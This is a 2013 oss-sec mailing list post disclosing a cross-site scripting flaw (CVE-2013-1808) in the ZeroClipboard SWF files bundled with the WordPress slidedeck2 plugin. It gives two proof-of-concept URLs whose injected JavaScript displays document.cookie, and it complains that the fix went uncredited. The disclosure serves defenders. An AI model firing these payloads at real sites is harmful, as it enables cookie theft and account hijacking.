oss-sec mailing list archives

Re: WordPress plugins vulnerable to CVE-2013-1808

From: Henri Salo <henri () nerv fi>
Date: Thu, 14 Mar 2013 11:06:20 +0200

On Sun, Mar 10, 2013 at 10:52:07AM +0200, Henri Salo wrote:

Plugin: slidedeck2
Version: 2.1.20130306

Affected file: http://plugins.svn.wordpress.org/slidedeck2/trunk/js/zeroclipboard/ZeroClipboard.swf 
406ca1ec9595fd96424e6c8f3802bc898f080116
PoC: 
wp-content/plugins/slidedeck2/js/zeroclipboard/ZeroClipboard.swf?id=\"))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

Affected file: http://plugins.svn.wordpress.org/slidedeck2/trunk/js/zeroclipboard/ZeroClipboard10.swf 
1ea0fc0cea30a7d912c2564d51204a816f1e58be
PoC: 
wp-content/plugins/slidedeck2/js/zeroclipboard/ZeroClipboard10.swf?id=\"))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height


This has been fixed in 2.1.20130306 version. Changelog
http://wordpress.org/extend/plugins/slidedeck2/changelog/ says:

2.1.20130306
Security improvements

Again no CVE added to changelog and reporter (me) not notified about fixes done.

--
Henri Salo

Attachment: signature.asc
Description: Digital signature

Current thread:

WordPress plugins vulnerable to CVE-2013-1808 Henri Salo (Mar 10)
- Re: WordPress plugins vulnerable to CVE-2013-1808 Henri Salo (Mar 14)
- Re: WordPress plugins vulnerable to CVE-2013-1808 Henri Salo (Mar 26)
- RE: WordPress plugins vulnerable to CVE-2013-1808 Christey, Steven M. (Mar 28)